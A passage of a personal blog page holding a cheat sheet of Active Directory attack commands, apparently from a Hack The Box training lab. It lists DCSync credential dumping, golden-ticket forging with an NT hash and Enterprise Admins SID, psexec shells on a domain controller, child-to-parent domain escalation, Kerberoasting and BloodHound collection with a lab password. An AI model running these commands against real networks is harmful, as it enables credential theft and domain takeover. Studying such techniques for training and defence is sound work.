<td><code>mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm</code></td>
<td>Uses <code>Mimikatz</code> to perform a DCSync attack from a Windows-based host.</td>
</tr>
<tr>
<td><code>secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt</code></td>
<td>Impacket tool used to perform a DCSync attack from a Linux-based host.</td>
</tr>
<tr>
<td><code>lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 </code></td>
<td>Impacket tool used to perform a <code>SID Brute forcing</code> attack from a Linux-based host.</td>
</tr>
<tr>
<td><code>lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep &quot;Domain SID&quot;</code></td>
<td>Impacket tool used to retrieve the SID of a target Windows domain from a Linux-based host.</td>
</tr>
<tr>
<td><code>lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 &quot;Enterprise Admins&quot;</code></td>
<td>Impacket tool used to retrieve the <code>SID</code> of a target Windows domain and attach it to the Enterprise Admin group’s <code>RID</code> from a Linux-based host.</td>
</tr>
<tr>
<td><code>ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker</code></td>
<td>Impacket tool used to create a <code>Golden Ticket</code> from a Linux-based host.</td>
</tr>
<tr>
<td><code>export KRB5CCNAME=hacker.ccache</code></td>
<td>Used to set the <code>KRB5CCNAME Environment Variable</code> from a Linux-based host.</td>
</tr>
<tr>
<td><code>psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5</code></td>
<td>Impacket tool used to establish a shell session with a target Domain Controller from a Linux-based host.</td>
</tr>
<tr>
<td><code>raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm</code></td>
<td>Impacket tool that automatically performs an attack that escalates from child to parent domain.</td>
</tr>
</tbody></table>
<h1 id="Trust-Relationships-Cross-Forest"><a href="#Trust-Relationships-Cross-Forest" class="headerlink" title="Trust Relationships - Cross-Forest"></a>Trust Relationships - Cross-Forest</h1><table>
<thead>
<tr>
<th>Command</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><code>Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName</code></td>
<td>PowerView tool used to enumerate accounts for associated <code>SPNs</code> from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc | select samaccountname,memberof</code></td>
<td>PowerView tool used to enumerate the <code>mssqlsvc</code> account from a Windows-based host.</td>
</tr>
<tr>
<td><code> .\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap</code></td>
<td>Uses <code>Rubeus</code> to perform a Kerberoasting Attack against a target Windows domain (<code>/domain:FREIGHTLOGISTICS.local</code>) from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL</code></td>
<td>PowerView tool used to enumerate groups with users that do not belong to the domain from a Windows-based host.</td>
</tr>
<tr>
<td><code>Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator</code></td>
<td>PowerShell cmd-let used to remotely connect to a target Windows system from a Windows-based host.</td>
</tr>
<tr>
<td><code>GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley</code></td>
<td>Impacket tool used to request (<code>-request</code>) the TGS ticket of an account in a target Windows domain (<code>-target-domain</code>) from a Linux-based host.</td>
</tr>
<tr>
<td><code>bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA-DC01 -c All -u forend -p Klmcargo2</code></td>
<td>Runs the Python implementation of <code>BloodHound</code> against a target Windows domain from a Linux-based host.</td>
</tr>
<tr>
<td><code>zip -r ilfreight_bh.zip *.json</code></td>
<td>Used to compress multiple files into 1 single <code>.zip</code> file to be uploaded into the BloodHound GUI.</td>
</tr>
</tbody></table>
</article><section class="jump-container is-flex is-justify-content-space-between my-6"><!-- em is empty placeholder--><a class="button is-default" href="/2023/09/24/AD-2/" title="AD_2"><i class="iconfont icon-prev mr-2 has-text-grey"></i><span class="has-text-weight-semibold">Previous: AD_2</span></a><a class="button is-default" href="/2023/09/23/AD/" title="AD"><span class="has-text-weight-semibold">Next: AD</span><i class="iconfont icon-next ml-2 has-text-grey"></i></a></section><article class="mt-6 comment-container"><script async repo="https://github.com/Taninluv/Taninluv.github.io" src="https://utteranc.es/client.js" issue-term="pathname" theme="preferred-color-scheme"></script></article></div></div></main></main><footer class="is-flex is-flex-direction-column is-align-items-center is-flex-shrink-0 is-family-serif"><section class="sns-container"><!-- Github--><a title="github" target="_blank" rel="noopener nofollow" href="//github.com/Taninluv"><i class="iconfont icon-github"></i></a><!-- Ins--><!-- RSS--><!-- 知乎--><!-- 领英--><!-- 脸书--></section><p><span>Copyright ©</span><span> Taninluv 2023</span></p><div class="is-flex is-justify-content-center is-flex-wrap-wrap"><p>Powered by Hexo &verbar;&nbsp;</p><p class="is-flex is-justify-content-center"><a title="Hexo theme author" target="_blank" rel="noopener" href="//github.com/haojen">Theme by Haojen&nbsp;</a></p><div style="margin-top: 2px"><a class="github-button" title="github-button" target="_blank" rel="noopener" href="https://github.com/haojen/hexo-theme-Claudia" data-color-scheme="no-preference: light; light: light; dark: dark;" data-show-count="true"></a></div></div><div><span></span></div></footer><script async defer src="https://buttons.github.io/buttons.js"></script><script src="/js/jquery-3.6.1.min.js"></script><script src="/js/jquery-fancybox.min.js"></script><script src="/js/img_zoom.js"></script><script src="/js/post.js"></script></body></html>